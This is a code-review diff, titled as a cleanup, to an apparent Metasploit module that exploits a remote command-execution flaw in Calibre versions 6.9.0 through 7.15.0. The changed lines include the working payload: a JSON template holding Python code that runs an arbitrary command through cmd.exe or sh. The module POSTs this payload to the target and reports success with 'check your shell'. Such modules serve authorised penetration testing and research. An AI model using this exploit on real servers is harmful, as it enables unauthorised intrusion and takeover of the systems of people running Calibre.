Code cleanup

Updated code for version detection and exploit invocation

Author: h4x-x0r

modules/exploits/multi/misc/calibre_exec.rb

@@ -93,7 +93,7 @@ def check
         vprint_status('Version retrieved: ' + version[1].to_s)
       end
 
-      if Rex::Version.new(version[1]) <= Rex::Version.new('7.15.0') && Rex::Version.new(version[1]) >= Rex::Version.new('6.9.0')
+      if Rex::Version.new(version[1]).between?(Rex::Version.new('6.9.0'), Rex::Version.new('7.15.0'))
         return CheckCode::Appears
       else
         return CheckCode::Safe
@@ -104,12 +104,7 @@ def check
   end
 
   def exploit
-    case target['Type']
-    when :win_fetch
-      execute_command(payload.encoded)
-    when :nix_cmd
-      execute_command(payload.encoded)
-    end
+    execute_command(payload.encoded)
   end
 
   def execute_command(cmd)
@@ -119,7 +114,19 @@ def execute_command(cmd)
   end
 
   def exec_calibre(cmd)
-    payload = "[[\"template\"], \"\", \"\", \"\", 1,\"python:def evaluate(a, b):\\n import subprocess\\n try:\\n  return subprocess.check_output(['cmd.exe', '/c', '#{cmd}']).decode()\\n except Exception:\\n  return subprocess.check_output(['sh', '-c', '#{cmd}']).decode()\"]"
+    payload = '['\
+    '["template"], '\
+    '"", '\
+    '"", '\
+    '"", '\
+    '1,'\
+    '"python:def evaluate(a, b):\\n '\
+     'import subprocess\\n '\
+      'try:\\n  '\
+        "return subprocess.check_output(['cmd.exe', '/c', '#{cmd}']).decode()\\n "\
+      'except Exception:\\n  '\
+        "return subprocess.check_output(['sh', '-c', '#{cmd}']).decode()\""\
+    ']'
 
     res = send_request_cgi({
       'method' => 'POST',
@@ -130,6 +137,8 @@ def exec_calibre(cmd)
 
     if res && res.code == 200
       print_good('Command successfully executed, check your shell.')
+    elsif res && res.code == 400
+      fail_with(Failure::UnexpectedReply, 'Server replied with a Bad Request response.')
     end
   end